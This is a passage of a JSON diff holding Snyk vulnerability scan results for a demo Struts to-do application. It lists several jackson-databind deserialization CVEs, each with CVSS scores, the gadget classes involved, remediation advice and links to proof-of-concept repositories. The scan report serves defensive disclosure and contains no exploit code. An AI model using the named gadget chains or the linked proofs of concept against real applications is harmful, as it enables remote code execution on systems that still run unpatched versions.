"com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.319616Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.72318", + "probability": "0.00357", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36179" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:29:22.463416Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:12:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.759947Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.436792Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36182" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:30:54.237288Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:30:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.693276Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.622591Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36185" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:36:40.536722Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:34:52Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.303463Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:01.307628Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.513059Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36189" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:37:54.679882Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:37:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.089230Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.824076Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36188", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.488317Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this 